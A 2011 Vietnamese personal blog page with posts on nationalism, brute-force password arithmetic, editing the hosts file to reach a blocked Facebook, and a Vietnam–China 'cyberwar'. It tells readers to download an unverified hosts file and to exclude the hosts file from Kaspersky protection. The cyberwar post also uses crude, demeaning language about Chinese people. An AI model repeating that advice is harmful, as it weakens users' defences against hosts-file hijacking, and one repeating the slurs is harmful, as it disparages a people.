ftp://ftp.mozilla.org/pub/firefox/releases/5.0/win32/en-US/Firefox Setup 5.0.exe

Wednesday, June 15, 2011

Dân tộc này chỉ mạnh và đoàn kết nhất khi có chiến tranh

Chuyện này ngẫm đâm ra đúng.

4000 năm lịch sử (theo sử liệu chính thống chứ theo nghiên cứu đáng tin cậy của các nhà sử học Việt Nam thì lịch sử của ta phải hơn 6000 năm ). Chiến tranh là chuyện dân tộc này trải qua không hề ít, ngoại trừ 2 cuộc nội chiến thời Trịnh - Nguyễn và Nam - Bắc phân tranh ( 1954 - 1975 ) thì Việt Nam hầu hết là đánh ngoại bang.
Mỗi lần có chiến tranh, là dân tộc này lại liên kết với nhau một cách đáng kinh ngạc. Có lẽ do lịch sử quá dài và quá nhiều cuộc đánh nhau, nên trong ADN của người Việt Nam đã có đoạn mã A-T-G-X nào đó đánh dấu việc này. Cứ chạm vào lòng tự tôn dân tộc này, thì cả tổ ong xôn xao một cách đe dọa ngay.

Do vậy nên chiến tranh chưa chắc đã phải chuyện dân tộc ta mất mát nhiều, tất có mất mát, đau khổ, nhưng quy luật tự nhiên của sự sinh - diệt - sinh là vậy. Sau cơn cháy rừng thì các mầm sống vươn lên mạnh mẽ hơn bao giờ hết.

Nếu phải đối mặt với chiến tranh, thì đành ráng sức bên nhau để vượt qua, rồi ta sẽ cùng nhau xây tiếp

Monday, June 13, 2011

Test quả RSS graffity xem nó có update lên wall ko

Test dữ liệu

Cách tính số tổ hợp mật khẩu cần phải so khớp khi Brute Force password

Công thức:

(số kí tự bảng chữ cái) ^ (chiều dài mật khẩu)

Đây là một kiến thức cơ bản bắt nguồn từ một kiến thức toán học rất cơ bản: "Hoán vị và Tổ hợp"

Tôi sẽ không giải thích lý thuyết toán học dài dòng của công thức tổ hợp rất cơ bản mà ta sẽ dùng để xác định số tổ hợp có thể có của của một mật khẩu bất kỳ. Đây là bài toán rất cơ bản mà một hacker cần phải thực hiện khi anh ta có ý định "Brute Force" một chuỗi mật khẩu bất kỳ. Anh ta cần phải biết là anh ta sẽ phải so khớp bao nhiêu mật khẩu, rồi tiếp theo đó anh ta đo đạc xem máy tính của anh ta ( hoặc hệ thống máy tính của anh ta ) có khả năng so khớp bao nhiêu mật khẩu một giây, rồi cuối cùng tính ra thời gian anh ta cần có để so khớp tất cả mật khẩu có thể có đã đề cập ở trên.

Wednesday, June 8, 2011

Dải IP mới nhất để vào Facebook ( 18-10-2012 )

Chỉnh file hosts để vào Facebook

Dưới đây là dải IP mới nhất để vào Facebook cho mạng nào IP facebook đang bị chặn bởi ISP . dải IP này thuộc về Facebook Ireland Inc - một Official Mirror của Facebook tại Châu Âu, nên tốc độ truy cập nhanh vãi đạn

31.13.79.7 www.facebook.com
31.13.79.7 facebook.com
31.13.79.7 www.login.facebook.com
31.13.79.7 login.facebook.com
31.13.79.7 apps.facebook.com
31.13.79.7 upload.facebook.com
31.13.79.7 graph.facebook.com
31.13.79.7 register.facebook.com
31.13.79.7 vi-vn.connect.facebook.com
31.13.79.7 vi-vn.facebook.com
31.13.79.7 static.ak.connect.facebook.com
31.13.79.7 developers.facebook.com
31.13.79.7 error.facebook.com
31.13.79.7 channel.facebook.com
31.13.79.7 upload.facebook.com
31.13.79.7 register.facebook.com
31.13.79.7 bigzipfiles.facebook.com
31.13.79.7 pixel.facebook.com
31.13.79.7 upload.facebook.com
31.13.79.7 register.facebook.com
31.13.79.7 bigzipfiles.facebook.com
31.13.79.7 pixel.facebook.com
 Copy đoạn trên vào trong file C:\WINDOWS\system32\drivers\etc\hosts

Còn lười quá thì down từ link sau file host về rồi copy vào C:\WINDOWS\system32\drivers\etc Nhớ là đổi tên file thành hosts ( vì nhiều khi download về nó tự thêm cái đuôi .txt vào )

http://www.mediafire.com/?sc388zjz40e7x84

Chú ý: để edit (chỉnh sửa) được file hosts, bạn cần sử dụng tài khoản có quyền Administrator trong máy (đối với windows 7) nếu không bạn sẽ bị báo lỗi "Access Denied" khi save file hosts.

Update: Đã upload được bằng dải IP mới này

Về vấn đề Kaspersky không cho thay đổi file host, hoặc tải về file host trên (chỉ là một file chữ không) bị kaspersky cảnh báo

Tôi giải thích thêm là Kaspesky mặc định cấm các hành động thay đổi nội dung file hosts (mặc dù việc này hoàn toàn an toàn), do đó để sử dụng các IP trên mà không bị kaspersky làm phiền thì bạn thực hiện add file hosts vào trust zone của kaspersky như sau:

1. Nhấp phải vào biểu tượng Kaspersky ở khay đồng hồ ( biểu tượng chữ K màu đỏ ấy ), chọn Setting
2. Click vào mục Threats and Exclusion ở cửa sổ bên phải
3. Click mục setting tại phần Exclusion 
4. Tại tab Exclusion rules bạn click chỗ + Add 
5. Click cái link Select Object ở cửa sổ mới hiện ra
6. Paste dòng dưới đây vào cái chỗ gõ chữ được của cửa sổ Object name 

%SystemRoot%\system32\drivers\etc\hosts

7. Click OK ở mỗi cửa sổ để đóng tất cả lại

Xong bây giờ Kaspersky sẽ không khóa file hosts của bạn nữa

Làm đúng các hướng dẫn trên thì 100% bạn sẽ truy cập FB bình thường

xnohat 

CyberWar giữa Việt Nam và tàu ?

Mấy bữa nay dân mạng Việt Nam đang loạn cả lên vì sự vụ oánh nhau giữa một vài cậu "hacker" Việt và hacker tàu.

Cái topic dài phải đến chục trang trên HVA diễn tả cái mớ cảm xúc hỗn độn này của dân mạng. Kẻ đòi đánh, người bảo thôi, loạn cào cào, toàn bộ nội quy nghiêm khắc của HVA trước nay được phép nới lỏng đôi chút để cho bà con thỏa chút "tình yêu nước".

Một câu hỏi xuyên suốt các thảo luận được đặt ra liên tục

Oánh nhau CyberWar với tàu, ta oánh "được" không ?
Cái chữ "được" ở đây sự thể quả là mông lung lắm. Nhiều ý kiến cho rằng tàu giỏi vụ hacking hơn ta, cái này tôi không đồng tình, kỹ nghệ và khoa học khi so sánh độ phát triển thì phải được tính từ "đỉnh" tính xuống, chớ tính cái "cào bằng" kiểu xã hội chủ nghĩa thì chả phản ánh được sự thật lắm.
Thật vậy, nếu so cái "đỉnh" thì ta không hề thua mà còn hơn tàu nhiều vì ta có nhiều nghiên cứu khoa học máy tính nói chung lẫn khoa hacking nói riêng, được thế giới công nhận, và tán tụng. "Nhưng" , ta chỉ được chút "chất" mà chả có "lượng", nếu nói tới phương diện trình độ trung bình, thì hacker tàu lẫn chuyên gia bảo mật của tàu, về chất thì tương đương nhưng về lượng chúng đông hơn. Chúng nguy hiểm hơn vì cái sự đông của chúng.

Dù rằng thế giới ảo ( Cyber ) cho ta một lợi ích rất lớn là tiến bộ vượt bậc về kĩ nghệ giúp ta bù đắp được rất nhiều về thiếu hụt "quân số" , nhưng ở nước ta, sự tiến bộ kĩ nghệ vẫn chỉ là "áp dụng công nghệ" chứ chả phải "phát kiến công nghệ".
Mà đáng buồn hơn nữa là nhiều người Việt ta theo Công nghệ thông tin mà có cái sự tự phụ quá lắm, áp dụng, triển khai được tí chút công nghệ của nước ngoài ( theo Guide của nước ngoài ), là tự cao về trình độ kĩ thuật của mình ngay. Ấy là cái nguy hiểm vô cùng, do đó mới chỉ là hiểu qua về công nghệ đó, chớ có phải là hiểu rõ ràng tường minh về thứ công nghệ mà mình áp dụng đâu ? Hiểu thôi thì quãng đường chạm đến "hacking" còn xa lắm lắm

Hacker của ta đa phần là coi "tút" do nước ngoài viết, thậm chí là tàu viết, rồi thử đi thử lại, làm theo như cái máy mà chả biết sự thể thực chất là tại sao mà như vậy.

Với sự hiểu biết còn hạn chế vậy thì thử hỏi, khi đối mặt với các hệ thống phức tạp chưa từng được công bố các thông số kĩ thuật ( specification ) rõ ràng của các tổ hợp công nghệ thông tin thuộc các công trình cơ sở hạ tầng hệ trọng của đối phương, thì làm sao đủ tầm để mà "hack". Hay nhìn vào đấy chỉ có cảm giác là ... chắc chắn quá, nên nghĩ là chắc không có lỗi bảo mật đâu mà hack.

---------------------

Mấy ngày qua chẳng qua là mấy cậu nhóc trình độ "script kiddies" tấn công Việt Nam thôi, chứ nếu bọn chuyên nghiệp của tàu nó oánh thì ta không đủ nhân lực mà phòng thủ toàn bộ hệ thống mạng Việt Nam đâu. Ta sẽ thua không vì không có chuyên gia giỏi, mà thua vì không đủ chuyên gia lành nghề.

---------------------
Nói thêm cho bạn nào đang ấp ủ vụ DDoS vào hệ thống mạng của tàu.
Quên chuyện đó đi, trừ khi bạn nắm được một điểm yếu mới trong kết cấu kĩ thuật của internet ( vd như lỗi tấn công DNS của Dan Kaminsky cách đây 1,2 năm ).
Vì tàu nó gần với tuyến cáp trục hơn Việt Nam, và chúng nó có băng thông mạng gấp 8 lần Việt Nam, tức là muốn phong tỏa mạng của tàu, thì cần huy động toàn bộ mạng của 8 quốc gia có quốc lực về tài nguyên mạng tương tự Việt nam thì mới phong tỏa được tàu.
Còn ta thì sao ? , tàu chỉ cần dùng 1/8 băng thông của nó là đủ làm nghẽn mạch mạng internet Việt Nam, biến internet Việt Nam thành một cái Việt Nam ... intranet :)) . Bạn không tin là tàu làm được ? , chính phủ tàu nó kiểm soát máy tính của người dân một cách ghê gớm, nói không ngoa là chính phủ tàu đã biến hầu hết máy tính của người dân thành Zombies , tàu chỉ cần ra lệnh là tất cả bọn chúng ồ ạt dội packet vào các router biên của mạng ta. Các thiết bị của ta làm sao chịu đựng được một lưu lượng mạng vượt trội hơn so với công suất danh định của chúng ? vì bình thường lưu lượng mạng của nước ta đâu có đạt tới mức đó ?

-------------------------------------

Có thể kết luận một câu

TQ nó to, nên cái éo gì của nó cũng to, từ nước nó to đến mạng nó to, thậm chí c* chúng nó chắc cũng như trâu nên mới đẻ khiếp thế được

-------------------------------------
P/s: Bài viết này nhằm khuyến khích các em nào có ý ngứa cựa thì lo mà học, để nước nhà có thêm quốc lực mà oánh với tàu, vốn không có thì oánh cái éo gì.
Còn em nào có vợ rồi thì ráng mà đẻ, chứ oánh nhau mà dân có 90 triệu so với 1,2 tỉ người thì chết mịa nó rồi chứ còn gì

Wednesday, April 13, 2011

Hà hà cái logo blog mới :))

Ôi mình nghiện các thiết kế đơn giản mà tinh tế của google. Không quá sang trọng ( mắc tiền ) như Apple, mà thiết kế của Google đơn giản, thanh thoát, như những nét vẽ của trẻ con.

Cứ kệ ai nói gì thì nói, ta hack cái banner vậy là hợp ý rồi ^_^

Blog giờ ai vào mà không nhìn kĩ dám bé cái lầm với Google official blog lắm :))

Sunday, March 13, 2011

Đi vòng vòng quyết định xây nhà với blogspot

Từ ngày Yahoo 360 ra đi, dân viết blog luôn phải băn khoăn tìm kiếm một chỗ xây nhà, đó là chưa kể cái nỗi băn khoăn đấy nó được nhân thêm khi mà các mạng xã hội thi nhau ra đời (và thi nhau bị firewall)

Mỏi chân chùn gối rồi,
Ngồi xuống đây rê chuột chút
Gẩy phím luận thế nhân

hackernohat